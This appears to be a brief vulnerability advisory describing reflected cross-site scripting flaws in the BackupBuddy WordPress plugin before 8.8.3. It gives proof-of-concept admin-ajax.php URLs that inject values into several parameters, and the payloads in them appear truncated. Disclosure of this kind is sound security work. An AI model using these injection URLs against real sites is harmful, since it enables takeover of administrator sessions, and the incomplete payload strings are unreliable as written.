BackupBuddy < 8.8.3 - Multiple Reflected Cross-Site Scripting

The plugin does not sanitise and escape some parameters before outputting them back in various places, leading to Reflected Cross-Site Scripting

PoC

Make a logged in admin/SA open one of the URL below: v < 8.8.3 https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&amp;function;=restore_file_view&amp;archive;=--!&gt;\- https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&amp;function;=restore_file_view&amp;file;=--!&gt;\- v < 8.8.2 https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&amp;function;=view_log&amp;serial;="> v < 8.8.1 https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&amp;function;=destination_picker&amp;add;=local&amp;filter;=local&amp;callback;_data=